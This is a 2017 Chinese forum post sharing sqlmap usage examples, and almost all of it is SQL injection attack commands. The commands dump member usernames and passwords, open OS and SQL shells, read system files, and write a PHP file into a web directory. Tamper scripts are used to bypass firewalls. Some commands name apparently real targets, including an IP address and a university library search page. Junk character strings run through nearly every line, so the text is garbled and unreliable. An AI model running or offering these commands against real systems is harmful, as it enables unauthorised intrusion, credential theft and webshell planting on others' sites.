找回密码
 立即注册
查看: 3015|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap
* k1 l7 G: T6 a- L- C3 |. O+ K$ Q' I' K
update :::::>     in the folder   after  execute    following   order : svn update
) \% K  D& L9 _# Y1 r/ Q  v
. z9 I: g7 ^" c) lsqlmap.py -r 1.txt --current-db
' l0 C8 s" `# ~0 D" a) H0 U" @! r5 I0 R0 Z+ a5 b" e
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”' B1 }# y7 G: L% s: V
. }/ P# F# T) N8 k' _3 `
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
8 I5 X; d, z( n9 W% r猜解数据库
* O. b7 V5 }3 m* y./sqlmap.py -u "injection-url" --dbs' O  {- p+ A& ^0 a: Z7 x
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"; ~+ _9 Y* I9 V. w0 D# h0 Y

; M& }. ~3 i, ?+ f* q5 P2 q, T猜解表名
0 p: i$ Y% Z5 B6 @8 o./sqlmap.py -u "injection-url" -D database_name --tables
) g1 T- G( Z& u0 a# D. E, Y6 w
: c  H5 L4 ?, q8 P: Usqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"0 z% ]3 |4 w( u4 w8 R1 L: ~/ a1 B3 a
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
0 E% g2 d: w( k. J; s5 R/ a# l1 G
% W. S6 u8 J7 t# Y$ Lsqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump+ x1 G" A1 f% ]9 m7 e
6 ^* w: e  b+ {; B* Z& a5 e: e
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"2 q6 x3 P1 ?+ A* Y9 z; H( ^1 N) j
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
5 r7 j0 ^+ _7 B2 nsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" / _4 l3 T7 C6 ]% I
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
  x. Y8 X- W3 Y" A6 d( ?7 z% r* w, J) m( r( J/ I! l# \
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
+ `1 U- J8 A% ^* \2 j1 w7 ~sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"2 C3 ~2 _$ r9 e
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"; s+ y! A1 i6 e. d+ C
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
, x- B: |4 k( i& b5 msqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
  z5 f9 W8 ?# P4 u
: Z) B' q: N! Z# r9 D7 i6 t# Nsqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了$ G* u% N% S( u  B' m
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"/ E; h( m2 R! e8 ]+ I

% j+ c1 T8 Y9 v  tsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
. ]( }( F# R' u8 e! a* v# k, n, l猜解列名
# h; b) }  A) W; B./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
/ Y9 O, n0 F9 x, b2 i
7 h# f) d* _$ K: l: X0 f( isqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
: m3 z! r! R' E& y! msqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" ) R) f+ u. ?- v4 ]( m
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"2 u2 E+ C5 ~/ |2 P% X- H4 L
, \- S% n$ T1 I" ?* |
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"2 F2 T' ]& N1 ]! h3 B
&submit=Go
2 z- ~% t0 t/ \" K* Y+ }猜解值
3 g/ e: f* E( d7 ]9 u./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump( c6 K- [/ Q% {2 g( m4 ~& g
========================================================2 C, [# s5 o! d  M" v0 C4 B
搜索表名中包括mana字符的
6 y2 A1 S( H' x/sqlmap.py -u "injection-url" -T mana --search" o6 {- @( ?& l8 ^2 |& h) `% a2 f. C
返回一个交互式sql shell! P: Z9 [. b2 @7 U) |1 E
/sqlmap.py -u "injection-url" --sql-shell8 j+ D( M) ~. ]- N# a1 u
读取指定文件(需权限)
4 B- W2 j: K. C8 a& J3 B8 k/sqlmap.py -u "injection-url" --file-read "c:\boot.ini", l& O- k" K- ^% H0 p
查看当前 用户 及 数据库   f1 e$ U% ]0 A; |
/sqlmap.py -u "injection-url" --current-user --current-db9 P$ x- R9 f& _1 n
本地文件 写入 远程目标绝对路径% f- N9 h# P  G" q
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径" g4 X/ t! K; d
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
( I5 `* O& [/ M+ I3 g2 t
. u# _, _$ Z, J; W7 Zsqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径" P+ J5 f+ o* k  Q- X9 r) h* T
查看某用的权限( m; [" K9 h8 J8 S# E
/sqlmap.py -u "injection-url" --privileges -U root$ V- g4 S' p8 w/ O. P5 ~
查看当前用户是否为dba' N8 t9 E) R; m  y
/sqlmap.py -u "injection-url" --is-dba5 H+ H2 f: c5 ~* W, |# j) g
读取所有数据库用户或指定数据库用户的密码
" o& p% z4 Q9 Wsqlmap.py -r 1.txt --users --passwords
# a; K3 ?( v& h' C; d9 l( Bsqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" ' f( M& C' U0 o" M) |$ ~

+ M! R  x9 e. O  n+ ]& |6 O/sqlmap.py -u "injection-url" --passwords -U root7 c  j0 y+ N5 w" _$ I
/ {0 d  u2 |$ U& h
--start&&--stop 与 --first&&--last 的区别8 V; @& l% V% R9 Q. {) `
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
2 L% L; Y) x2 y! y/ B$ G3 u7 c% M# F/ ~% P2 e* n, }; }' @
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
4 Y" n) @3 a- l% o$ r% r/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables/ G( g8 O+ I/ \7 C7 a
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns6 v2 x( E( w( H( k/ Q
: ~# I# {; B. A3 U' u, Z
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)0 j. R7 ~( E1 o$ n! V
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
- j5 a! e; X/ p3 E- f% u# N0 \
# |% k9 T+ c% s# a; r: r2 N
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表